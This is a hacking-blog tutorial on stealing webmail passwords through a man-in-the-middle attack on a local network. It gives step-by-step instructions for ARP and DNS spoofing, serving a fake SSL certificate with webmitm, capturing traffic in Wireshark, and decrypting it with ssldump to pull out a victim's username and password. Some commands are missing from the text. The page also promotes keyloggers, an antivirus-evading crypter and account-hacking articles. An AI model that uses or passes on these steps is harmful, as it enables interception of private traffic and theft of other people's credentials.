It is nothing but an attacker who sits in between the two user in an network. Normally the two person will be the user and the router(gateway) in an network. The attacker will try to do few trick and replace the roll of router and he sits in his position. This is done by doing DNS spoofing, ARP poisoning, IP spoofing and few more other method. In this attack the user will not come to know that, his traffic is been forwarded through the attacker in the network. The attacker can simply gather information about the user and use it later or attacker can try to do active attack to the user.
You might be interested in some of our other articles:
- Download Free 100% FUD Crypter To Bypass Antivirus Detection
- Doxing Tutorial : Hack Hotmail and Facebook Account Password
- Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
- Remote Password Hacking Software - Sniperspy keylogger
- How To Hack Password Through Mobile
Hacking Passwords Using MITM (Man In The Middle) AttackDefinitons :
- SSL : Secure Sockets Layer, a computing protocol that ensures the security of data sent via the Internet by using encryption . With SSL, client and server computers exchange public keys, allowing them to encode and decode their communication. So any attacker tries to sniff traffic between them will only get encrypted garbage values... the web servers which use SSL are denoted by HTTPS ...
- ARP : Address Resolution Protocol is a network layer protocol used to convert an IP address into a physical address such as an Ethernet address( MAC address ). A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the IP address in the request then replies with its physical hardware address.
- DNS : Domain Name System is a database system that translates a domain name into an IP address. for example if you type gmail.com in your browser , your DNS will reply with gmail's ip so that,your router can connect to gmail's server using its IP....for better understanding type -->" nslookup " in your cmd or konsole and then type "gmail.com" ,you will see your DNS replies you with gmail's ip addresses .
- ARP Spoofing : ARP spoofing is a technique in which a host in a LAN can "poison" the ARP table of another host by forging fake ARP requests and replies , causing it to send packets to the wrong destination. The attacker can modify the traffic in the network such a way that it will redirect all traffic to go through it. ARP Spoofing will allow an attacker to sniff data frames.
- DNS Spoofing : DNS spoofing is similar to arp spoofing ,it is based on the presentation of false or fake DNS information to the slave in a response to their DNS request and as a result forcing them to visit a site which is not the real one.
- MITM : Man in the middle attack means intercepting a communication between two systems ,both ARP Spoofing and DNS Spoofing are types of MITM attack..
- IP Forwarding : IP forwarding enables one host to sit on two LANs and to act as a gateway forwarding IP packets from one LAN to another.
- Fragrouter - tool used to for ip forwarding between slave and its destination host.
- Arpspoof - to arp spoof slave machine and its host
- Dnsspoof - to dns spoof slave machine and its host
- Webmitm - its a tool which transparently proxies and sniffs HTTP / HTTPS traffic redirected by dnsspoof, capturing most "secure" SSL-encrypted webmail logins and form submissions...
- Wireshark - it is a network protocol analyzer . here its used to capture ssl encrypted traffic between slave and webmitm...
- Ssldump - decrypts ssl packets using private key
All these tools are installed in backtrack 5..
Step 1: First we need to setup ip forwarding using fragrouter. open a shell and type the command...
This is to forward packets between the slave and its gateway while spoofing .... minimize the shell..
Step 2: Now we need to arp spoof the slave , open a new shell and type the command.
arpspoof -t [target ip] [default gateway ip]
arpspoof -t 192.168.1.7 192.168.1.1
then minimize the shell .... now we have begin to arpspoof the slave...
Step 3: then for dns spoofing open a new shell and type
then minimize the shell.... now all the DNS request from the slave will be redirected to us..
Step 4: To give proxy for these DNS requests ,we have to start up Webmitm open a new shell and type.
if you were starting Webmitm for the first time it will ask you some details to create fake SSL certificate and private key ... just fill something in it...if you fill everything,then it will say " webmitm relaying transparently "
ok its done, minimize the shell..
Step 5: Now we need to capture the traffic using wireshark
applications ->backtrack -> information gathering ->network analysis ->network traffic analysis ->wireshark
Step 6: In wireshark select
capture -> interfaces -> start (cick start button near eth0 )
since the Dns has been spoofed, we can see the nslookup for gmail in slave computer shows attacker's ip :
In our case slave opens "gmail.com" in browser .He will be redirected to webmitm , which will issue the 'gmail page' with fake ssl certificate ,then our slave well log into "gmail" using his credentials... now all the traffic will be captured by wireshark ...then just stop the wireshark and save the captured traffic to root folder ... for example, i will save it as "test"..
In the root folder there will be another file called "webmitm.crt"..it is the fake ssl certificate generated by webmitm...
Now we have captured ssl packets and our own fake ssl certificate..
now to decrypt the captured packets...
open another new shell and type :
ssldump -r test -k webmitm.crt -d > finaloutput
test -->captured packets
webmitm.crt --> SSL certificate
finaloutput --> decrypted output file
now open a shell and type :
cat finaloutput | grep Email
it will show you the decrypted username and password .
So friends, I hope you have enjoyed reading the aricle.if you have any doubts, please mention it in comments.
Filed Under: hack facebook , hack hotmail , hack twitter , HACKING SOFTWARES
Click Here To Download Winspy Keylogger